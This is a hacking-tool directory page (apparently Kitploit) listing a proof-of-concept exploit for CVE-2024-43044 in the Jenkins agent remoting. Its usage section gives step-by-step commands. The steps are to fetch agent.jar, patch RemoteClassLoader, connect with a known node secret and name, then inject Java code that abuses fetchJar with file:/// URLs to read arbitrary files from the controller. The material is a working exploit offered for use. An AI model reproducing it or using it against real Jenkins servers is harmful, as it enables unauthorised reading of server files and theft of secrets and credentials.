Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-43044-POC — CVE-2024-43044的利用方式 | Kitploit
Tools/GitHubGitHub/v9d0g/cve-2024-43044-poc
Vulnerability AnalysisExploitationWeb Application ExploitationRemote Access ToolPayload Development
GitHubv9d0g/cve-2024-43044-poc

CVE-2024-43044-POC

CVE-2024-43044的利用方式

View Repository
20122 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Usage

Download the JAR package via http://ip:port/jnlpJars/agent.jar

Modify the corresponding code in \hudson\remoting\RemoteClassLoader.class

Recompile and repackage

Need to know the node's secret and name in advance

root@kitploit:~
java -jar agent.jar -url http://ip:port/ -secret <xxx> -name <xxx>

Add the following content:

root@kitploit:~
import java.util.Scanner;

try {  
    Scanner scanner = new Scanner(System.in);  
    System.out.print("输入读取文件path:");  
    String inputText = scanner.nextLine();  
    System.out.println("尝试读取:" + inputText);  
    URL jarFileUrl = new URL("file:///" + inputText);  
    byte[] fileContent = this.proxy.fetchJar(jarFileUrl);  
    String contentAsString = new String(fileContent, StandardCharsets.UTF_8);  
    System.out.println("文件内容:\n" + contentAsString);  
} catch (Exception var10) {  
    System.out.println("WRONG:" + var10);  
}

Download Tool